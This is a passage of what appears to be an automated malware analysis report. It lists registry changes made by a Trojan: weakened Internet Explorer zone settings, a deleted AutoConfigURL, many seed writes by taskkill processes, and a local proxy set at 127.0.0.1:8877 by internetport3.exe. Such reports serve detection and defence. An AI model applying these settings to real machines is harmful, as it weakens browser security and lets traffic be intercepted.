"History" = "%Documents and Settings%\%current user%\Local Settings\History"-loopback>

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process vchk.exe:1656 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 DF 5D 88 D3 C3 F1 C6 1B 98 5E D6 E9 1B C3 E7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process taskkill.exe:216 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 93 BC A3 D3 D7 49 8B F7 E4 D5 3C E0 03 0F 6C"

The process taskkill.exe:1140 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 F6 22 74 4D 10 C4 F9 83 65 EF 28 AF FB 81 EC"

The process taskkill.exe:668 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 94 A3 50 FF 0C F5 68 7B AE CC 12 9E 62 F6 D0"

The process taskkill.exe:136 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 73 F9 29 97 97 A9 82 13 52 68 C1 99 28 22 82"

The process taskkill.exe:492 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 19 93 EE E8 E1 6A AA 91 E8 A3 60 CC 69 2F 55"

The process taskkill.exe:1832 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 39 6D B2 A3 4D A0 55 90 E9 12 1A 3A 22 E8 A1"

The process taskkill.exe:1836 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 20 3F 7F 9A 47 B5 2B 54 FE 2B CC 78 8B 6A E2"

The process taskkill.exe:1772 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 6C F5 87 CA FA 26 E6 73 67 20 17 B2 E5 66 17"

The process taskkill.exe:1548 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 59 05 39 97 E4 56 EF CF 4B 88 CB 0E BD 6E E9"

The process taskkill.exe:1372 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 6D 7A 46 50 74 95 31 F8 4C 58 3A 6F 79 47 C9"

The process taskkill.exe:936 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 2B DC 50 7A B8 79 89 C2 DE C6 17 59 1B A3 FA"

The process taskkill.exe:2012 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 B4 CA E1 60 FE 67 B4 3C E1 99 A6 D5 91 EF 78"

The process taskkill.exe:1096 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 2C A1 7F C9 FD 11 D0 31 89 6B F4 AA BD B0 71"

The process taskkill.exe:628 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 81 65 BA 79 FE C4 93 D9 75 0F 90 04 FC 06 56"

The process taskkill.exe:1092 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 15 F3 3E C8 38 09 C4 88 A7 08 E1 A3 5B 30 73"

The process taskkill.exe:1492 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 D7 1E 8A D6 AC 3C AD 29 88 C7 FA 1E 9A F1 7B"

The process taskkill.exe:1956 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 63 70 2C 0D 0D 17 5C 31 7C 58 75 FC BB 89 7B"

The process taskkill.exe:1952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 23 27 12 99 BB F7 97 96 01 9F 9A 3E 33 E0 9E"

The process taskkill.exe:828 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 7E 4F 72 77 3F 2A BE 9F 17 87 32 67 B5 95 0F"

The process taskkill.exe:1668 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 E1 1D F6 B4 B8 E1 BD 2F 00 EE F2 68 0C F8 90"

The process taskkill.exe:820 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 84 93 49 3D 10 16 72 7C BC 36 CD 61 23 4C 7D"

The process taskkill.exe:376 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F A8 D1 53 8B 36 BB 38 AA A3 1E 28 08 19 E6 EE"

The process taskkill.exe:596 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6F 23 3A 08 4F 0D 3D B3 43 81 3F CF DA 00 44"

The process taskkill.exe:1124 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 8A CF 16 44 53 62 3F 85 F7 AE 4C 63 0A 18 9D"

The process taskkill.exe:316 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 E6 31 36 08 B2 B0 4F 25 4E 82 92 54 61 61 D8"

The process taskkill.exe:1088 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 EC D0 A2 BC A8 1B EF FD 94 52 12 45 B0 1A AA"

The process taskkill.exe:1928 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 16 DC 5D 9F 2F 17 AF 45 64 C4 63 C4 BF 4B 7C"

The process taskkill.exe:1852 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 76 07 CA F7 88 2A 9A 9A D2 05 00 9B 6B 59 C5"

The process taskkill.exe:1856 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 4B 76 F5 3E EA E2 9C 63 B3 AF 8A 53 E1 E4 EE"

The process taskkill.exe:1252 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 3E 23 20 D3 8B 0E 85 12 6F B7 B4 E7 EE FD BA"

The process taskkill.exe:1016 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 C1 E2 D7 BE 9B F3 C9 18 0E 95 DE 1B FA 86 11"

The process taskkill.exe:916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 4C E1 12 A1 31 3C B7 2E 9F 46 D7 AF C9 AE 80"

The process taskkill.exe:1656 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 61 58 2A 86 33 C3 FD 9B 06 CC 0A F9 25 7F 69"

The process taskkill.exe:308 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 0C B5 11 01 30 CF B0 F5 14 AA 12 F2 14 AA BB"

The process taskkill.exe:448 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 B8 00 FA DA E7 82 01 47 3C 00 15 E0 0B 73 91"

The process taskkill.exe:1232 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 4D 80 67 1E 33 A9 F0 FC 00 9A 03 2E 27 A7 C9"

The process taskkill.exe:440 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 16 19 B5 66 63 2A 7F B8 58 F7 71 8A AD E4 69"

The process taskkill.exe:1136 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF C1 4E B3 2E CA 3C 92 43 BC 00 27 EA BB DC 82"

The process taskkill.exe:1932 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B BA 3D 48 57 06 1C D6 C4 CD 87 8E 59 90 75 99"

The process taskkill.exe:908 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 A5 B0 1C 41 B8 DD CA 36 1A 6D 68 97 AB 9D F6"

The process taskkill.exe:1240 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 15 48 C9 FC 56 45 01 AF FF DF 59 C9 DB 4B 72"

The process taskkill.exe:648 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 ED 98 96 0E 04 6D 27 78 D8 C8 25 9D A6 99 2B"

The process taskkill.exe:1632 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 FE 50 94 AD 5C 87 09 90 97 60 5F 88 D6 8D 58"

The process taskkill.exe:516 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 35 25 80 D7 C2 C3 1F B5 B9 D2 CE 50 74 09 9F"

The process taskkill.exe:1348 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE AF 74 7E A0 DB 95 43 E8 C8 68 F1 EF 09 7A 52"

The process taskkill.exe:1340 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 D0 44 1F 2F 5F BF 6D A7 47 3C BB 9C 1A 85 CC"

The process taskkill.exe:336 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A DD 3A 77 E9 A5 AD 1C 3B 9A E3 F5 D6 22 03 65"

The process taskkill.exe:576 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 4C 6E 06 63 04 E3 31 E3 CE DF 93 48 C9 EE 56"

The process taskkill.exe:856 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 50 68 5C 76 40 A3 2F 27 50 C2 F9 52 98 08 C1"

The process taskkill.exe:1424 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 0B 9E 71 1F D2 1D 8A 73 67 63 2E 10 1A 49 DB"

The process taskkill.exe:1980 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 13 8E 79 4B 09 FF 11 F5 59 FB 54 A6 B0 B1 F6"

The process taskkill.exe:1584 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 BA EE 65 F3 44 F6 B4 AD D5 64 1B D3 07 EA B8"

The process taskkill.exe:652 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 E7 EF 88 98 A3 94 9E F8 3F ED B8 32 1E 41 A3"

The process taskkill.exe:508 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 18 AC 72 96 FC 82 D6 2B EC C0 B6 53 F4 F8 15"

The process taskkill.exe:480 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 62 99 B2 6F A1 97 4A D4 20 42 C1 72 49 A4 13"

The process taskkill.exe:568 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 C0 16 16 73 53 58 25 19 CD A4 42 24 2D 33 77"

The process taskkill.exe:468 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 6C 29 D1 81 96 03 8C 49 48 01 FB 8A 8C F8 D4"

The process taskkill.exe:464 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 61 DA B0 A6 ED 57 25 AB E1 42 DA 5E D2 F5 07"

The process taskkill.exe:564 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 53 1B C8 C2 F6 3A 1F 7F F0 71 C0 5B D3 87 98"

The process taskkill.exe:1804 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 62 98 B3 40 07 F7 BD 0A A6 CA 5E AA 96 E3 32"

The process taskkill.exe:168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 3A EC 96 6C 63 63 87 13 D3 ED D7 9F B9 D6 F7"

The process taskkill.exe:228 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 F7 A2 EE 48 DE C9 4B 41 DA C6 5C 60 7A 15 94"

The process taskkill.exe:1868 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 7B 47 4A 4B 47 26 9D 61 46 4E B1 9E 09 AA 80"

The process taskkill.exe:224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C4 89 E2 30 39 43 20 7D 4E B0 7F 67 27 51 CD"

The process taskkill.exe:1916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 6E 2F 89 A4 37 DE 11 E4 0E D9 C8 6A 44 52 7B"

The process taskkill.exe:968 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C F1 6C 10 FD 62 E0 F5 F4 77 E3 A8 51 D7 D0 5C"

The process taskkill.exe:1180 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 51 54 07 6E 73 DB B3 B2 A0 E1 91 C7 14 0F 74"

The process taskkill.exe:1456 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 93 D3 2B E5 AA 57 9E 1A ED 1B 47 B8 B5 33 00"

The process taskkill.exe:1748 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F4 D9 BB 9B AF 63 C8 B1 AB 96 70 37 4B E1 72"

The process taskkill.exe:1740 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 05 C9 C4 34 FC 1F AF B7 49 80 4A 75 CD 37 66"

The process taskkill.exe:740 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 23 7C 0F 36 E4 01 12 58 88 0B FC FB 85 2A 21"

The process taskkill.exe:1160 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 04 97 F5 53 B0 CE ED 13 F0 0D 42 B9 D5 62 1E"

The process taskkill.exe:884 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 F1 22 73 48 15 1B 8F 5F 6A 12 E2 7A D3 9C 08"

The process taskkill.exe:1204 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB A1 30 89 76 82 71 20 73 DD 68 0B 1D E3 84 5B"

The process taskkill.exe:608 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DB FC 98 CE F7 8F E2 20 4C E2 FF 96 87 46 06"

The process taskkill.exe:552 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 E3 6C E6 0A C8 17 8A 17 27 C0 17 C4 4C AD E8"

The process taskkill.exe:1968 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 53 47 38 DF B3 07 EF EA 21 B0 AB E0 A3 E9 87"

The process taskkill.exe:872 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 CF 15 73 59 C5 38 79 A5 DD 84 F7 C2 52 AF 0C"

The process taskkill.exe:956 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 A6 D7 4E 60 0B A8 25 74 B4 A7 0B 81 70 E7 8E"

The process taskkill.exe:320 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 9A B3 3C 8D 61 25 70 80 61 E0 46 65 C1 50 18"

The process taskkill.exe:1112 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 5E B0 51 14 00 D7 6F 6E EE AF 81 56 44 26 D6"

The process taskkill.exe:324 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E CD 6C A2 0C 76 14 2C F1 96 15 C7 D4 BA B5 FC"

The process taskkill.exe:1752 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 21 4F 9F F3 9E 16 F8 9C 1F 91 77 A8 53 F4 07"

The process taskkill.exe:612 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 5D 34 7C 62 EB 71 8A 42 C9 72 77 81 7A B8 2B"

The process taskkill.exe:1888 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 14 C8 2E C5 DC 78 88 87 94 9D 6D FA C8 B7 74"

The process taskkill.exe:1884 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 4B 37 E6 2D 1B 30 A5 E6 D3 C6 A0 73 ED 26 41"

The process taskkill.exe:1760 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C AE B0 25 BE A2 47 B9 2B B6 96 E8 28 A9 0C F4"

The process taskkill.exe:1880 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 20 1E 2A 8C 91 DB AA 03 1A F1 5C C4 7B 0F DB"

The process taskkill.exe:1284 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF B5 47 57 95 4D D4 18 D1 5B 37 FB 92 0F 88 2F"

The process taskkill.exe:512 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 02 1B B6 F4 97 51 5C F8 A8 31 30 70 4E C0 EE"

The process taskkill.exe:1472 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 A4 B2 83 82 78 F4 E3 86 9B 8A 55 29 FA 16 7B"

The process taskkill.exe:808 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 E2 12 93 66 9A 80 ED 10 8E EA B3 FC 40 37 80"

The process taskkill.exe:2008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 5E 05 11 5B 8C 1E C6 22 66 0B A8 A8 36 6E 50"

The process taskkill.exe:1368 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 E7 35 FA F2 2F F3 BC 55 20 A1 EF 8A 38 BC DD"

The process internetport3.exe:360 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 40 D6 28 4C 09 7F ED B5 BC 80 8E C2 82 82 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
